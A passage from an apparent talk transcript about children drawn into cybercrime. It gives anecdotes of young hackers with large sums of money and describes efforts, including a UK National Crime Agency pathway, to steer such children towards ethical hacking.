wish my kid was like that." He maybe is. Uh the next day he went up to his parents. And the only reason they found out is because he said, "At what point should I start paying tax?" Which may be self- selecting in itself. By the way, the threshold for a minor is $6,000 if anyone's worried about what your kid's up to. So the thing is he's now part of our youth community and he's just finished an internship with us. He's now 15. He's now using his hacking skills for ethical hacking and that's a sign of a a kid can go well. We've come across an 11-year-old with $14 million in his bank account in Oxford. And I
remember his mom who was a lawyer saying, "I'm just really worried people are going to think Johnny's a criminal." I was like, "Well, I probably he's probably a criminal." There's an eight-year-old we've come across who's got $4 million in a bank account. There is a kid famously in the Netherlands who eight years old ordered an AK-47 to be delivered to his nice Bloomandal suburban home. So the reality is and you guys will know that story already. So the reality is these kids are like are super highly active. So how do we uh how do we help them? How do we direct them away from this journey? This journey is actually developed by the National Crime Agency in the UK and done